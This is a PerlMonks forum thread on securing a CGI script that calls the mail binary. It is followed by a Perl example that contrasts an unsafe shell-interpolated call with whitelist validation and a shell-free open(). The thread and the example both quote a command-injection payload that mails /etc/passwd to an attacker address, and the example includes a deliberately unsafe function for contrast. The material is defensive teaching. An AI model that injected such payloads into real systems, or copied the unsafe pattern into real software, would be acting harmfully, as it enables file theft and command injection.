PerlMonks  

Re: Yet another email question

by amphiplex (Monk)
on Jul 23, 2002 at 09:42 UTC


in reply to Yet another email question

Hi!

I can't believe that this works, you have not specified any recipients? Or are you using some custom mail?

Aside from this:
  • You really should be using a module, especially when using this in a CGI script.
  • If you absolutely must use the mail binary, make sure to check the variables. If you don't check the user input here, someone could, for example, give you a dirname of "; mail foo@hacker.com < /etc/passwd". So strip out at least: [&;<>"'`|]
  • Use the absolute path to your mail binary, something like /usr/bin/mail.

---- amphiplex

Re^2: Yet another email question
by Aristotle (Chancellor) on Jul 23, 2002 at 13:49 UTC

    No no no. Don't strip out blacklisted characters. Instead, strip out any but whitelisted ones. For example, s/\W+//g. It is too easy to overlook something otherwise.

    bikeguy: you probably want to read perlsec. Also, Ovid's excellent CGI course has a good easily digestible discussion of CGI script security.

    Makeshifts last the longest.
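The two replies above describe one fix from two angles: amphiplex's (validate the input, use the absolute path to the binary) and Aristotle's (whitelist the characters you accept instead of blacklisting the ones you fear). The following is an added example, written for this page and not code posted by either monk or by bikeguy; it shows the unsafe shell-interpolation pattern the thread warns about beside a hardened version. The `/usr/bin/mail` path is the one amphiplex suggested; the directory-name field, recipient address, report file and message body are constructed values.

```perl
#!/usr/bin/perl
use strict;
use warnings;

# Constructed scenario: a CGI handler that mails a report about a directory
# named in a form field. $dirname stands in for the untrusted CGI parameter
# from the original thread. $to is a fixed, administrator-configured address,
# not user input, so it is not subject to the same check here.

# Whitelist validation, as Aristotle's reply recommends: accept only the
# characters explicitly allowed (word characters, dot, dash) and a sane
# length, and reject everything else rather than trying to strip out
# individual shell metacharacters. Returning the capture ($1) also untaints
# the value when the script runs under perl -T.
sub validate_dirname {
    my ($input) = @_;
    return unless defined $input;
    return $1 if $input =~ /\A([\w.-]{1,64})\z/;
    return;
}

# UNSAFE: the pattern the thread warns about. The untrusted value is
# interpolated into one string that /bin/sh parses, so any shell
# metacharacter in $dirname changes the command that actually runs.
sub send_mail_unsafe {
    my ($dirname, $to) = @_;
    my $cmd = "mail -s 'Report for $dirname' $to < /tmp/report.txt";
    return system($cmd);    # single-string form: a shell is involved
}

# SAFE: validated input, an absolute path to the binary, and the list form
# of open(), which hands the arguments straight to execve() with no shell,
# so the value can never be parsed as part of a command line.
sub send_mail_safe {
    my ($dirname, $to, $body) = @_;
    my $clean = validate_dirname($dirname);
    die "invalid directory name\n" unless defined $clean;

    my $mail = '/usr/bin/mail';    # assumed location, as in amphiplex's post
    open my $fh, '|-', $mail, '-s', "Report for $clean", $to
        or die "cannot run $mail: $!";
    print {$fh} $body;
    close $fh or die "mail exited with status $?\n";
    return 1;
}

# Demonstration on constructed inputs: no mail is sent, only the check runs.
# The second candidate is the payload quoted in amphiplex's reply.
my @candidates = (
    'weekly-report',
    '; mail foo@hacker.com < /etc/passwd',
);
for my $candidate (@candidates) {
    my $ok = validate_dirname($candidate);
    printf "%-40s => %s\n", "'$candidate'",
        defined $ok ? "accepted ($ok)" : "rejected";
}
```

Two design points worth noting: the regex is anchored with `\A` and `\z` and captures the whole value, so there is no way for extra characters to ride along before or after the matched part; and the list form of `open` (or `system`) removes the shell from the picture entirely, so even a value that slipped past validation would reach `mail` as a literal argument rather than as shell syntax. As amphiplex's first bullet says, a mail module that builds the message itself avoids the external binary altogether and is the better choice for CGI.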
